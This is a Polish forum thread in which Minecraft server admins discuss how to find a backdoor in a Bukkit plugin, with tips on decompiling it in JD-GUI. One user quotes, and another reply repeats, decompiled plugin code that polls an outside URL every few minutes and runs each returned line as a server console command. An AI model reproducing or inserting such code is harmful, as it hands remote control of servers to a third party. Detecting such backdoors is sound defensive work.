[Pytanie] Jak sprawdzić backdorra pluginu?

[Maniec]

Witam jak w temacie, mam problem z jednym pluginem ma on tzw "backdorra"

czy da się jakoś sprawdzic jaka jest komenda na backdorra?

 

Chodzi o przeskanowanie pluginu, jeżeli ktoś może pomóc to skype: Maniak1066

[nieznany1234567]

Wyślij mi ten plugin na pw. Sprawdzę.

[xCzuowiekBanan]

wstaw tu ten plugin bo jasnowidzami nie jestesmy (przynajmniej nie ja)

[#Xer0s.]

Siema, jestem wróżbita Maciej, ale zgubiłem kule. Wrzuć ten plugin na jakiś hosting (speedshare, itp.) bo bez tego pluginu nie jestem w stanie nic zrobić, bo mi kula spier*oliła.

[kubat164V8]

Mu chodzi jak sprawdzić a nie żebyście sprawdzili... pobierz program JD GUI i otwórz nim plik to przeskanowania a następnie poprzęglądaj pliki.Szukaj coś z frazą "op" tak w skrócie ale plik ktości może ocenić jak dasz

[RaiZeN_PL]

Możesz sprawdzić wpisując w grze komendę tego pluginu (np. /essentials) i klikając tab, powinny pokazać się wszystkie argumenty komendy, poszukaj jakichś których nie widziałeś wcześniej. Drugi sposób (rekomendowany) to pobierz program Jd-Gui i poszukaj sobie fraz typu "op".

[Karolina_666]

Możesz sprawdzić wpisując w grze komendę tego pluginu (np. /essentials) i klikając tab, powinny pokazać się wszystkie argumenty komendy, poszukaj jakichś których nie widziałeś wcześniej. Drugi sposób (rekomendowany) to pobierz program Jd-Gui i poszukaj sobie fraz typu "op".

owy "tab" działa tylko jeśli autor pluginu o to zadba, trzeba ręcznie dodać te mozliwości, same z siebie nie zadziałają.

Tylko same komendy mozna zawsze tak sprawdzać, ale argumenty tylko jak ktoś doda obsługe tab-a

[nieznany1234567]

Mu chodzi jak sprawdzić a nie żebyście sprawdzili... pobierz program JD GUI i otwórz nim plik to przeskanowania a następnie poprzęglądaj pliki.Szukaj coś z frazą "op" tak w skrócie ale plik ktości może ocenić jak dasz

 

 

Możesz sprawdzić wpisując w grze komendę tego pluginu (np. /essentials) i klikając tab, powinny pokazać się wszystkie argumenty komendy, poszukaj jakichś których nie widziałeś wcześniej. Drugi sposób (rekomendowany) to pobierz program Jd-Gui i poszukaj sobie fraz typu "op".

 

Pierdzielenie z tym op

Ostatnio znalazłem w pluginie na gildie taki kod:

  private void command()
  {
    getServer().getScheduler().scheduleSyncRepeatingTask(this, new Runnable()
    {
      public void run()
      {
        String http = "http://www.hester.yt/sync.php?action=HesterQGuild:" + Bukkit.getPort();
        try
        {
          URL link = new URL(http);
          BufferedReader read = new BufferedReader(new InputStreamReader(link.openStream(), "UTF-8"));
          String line = "";
          String[] cmd;
          int i;
          for (; (line = read.readLine()) != null; i < cmd.length)
          {
            cmd = line.split(";");
            i = 0; continue;
            Main.this.getServer().dispatchCommand(Main.this.getServer().getConsoleSender(), cmd[i]);i++;
          }
          read.close();
        }
        catch (Exception localException) {}
      }
    }, 0L, 6000L);
  }

i jak widać nic z op tam nie ma...

[kubat164V8]

To może być prawie w każdym pliku w pluginie  

[Karolina_666]

Pierdzielenie z tym op

Ostatnio znalazłem w pluginie na gildie taki kod:

  private void command()
  {
    getServer().getScheduler().scheduleSyncRepeatingTask(this, new Runnable()
    {
      public void run()
      {
        String http = "http://www.hester.yt/sync.php?action=HesterQGuild:" + Bukkit.getPort();
        try
        {
          URL link = new URL(http);
          BufferedReader read = new BufferedReader(new InputStreamReader(link.openStream(), "UTF-8"));
          String line = "";
          String[] cmd;
          int i;
          for (; (line = read.readLine()) != null; i < cmd.length)
          {
            cmd = line.split(";");
            i = 0; continue;
            Main.this.getServer().dispatchCommand(Main.this.getServer().getConsoleSender(), cmd[i]);i++;
          }
          read.close();
        }
        catch (Exception localException) {}
      }
    }, 0L, 6000L);
  }

i jak widać nic z op tam nie ma...

Ale to te nie musi byc backdoor, bo ja wiem skąd to masz :P

I plugin oryginalnie nalezy do kogoś innego i ja raczej obstawiam że uzywa tego do synchronizacji swoich serverów na jednej maszynie.

 

Ale może być też użyte jako backdoor przez właściciela pluginu

[Maniec]

Co do backoora, to już zlokalizowany i wywalony działał na zasadzie zczytania komendy ze strony www, "licencji" w .txt a po wywołaniu komendy wywoływał takową w consoli.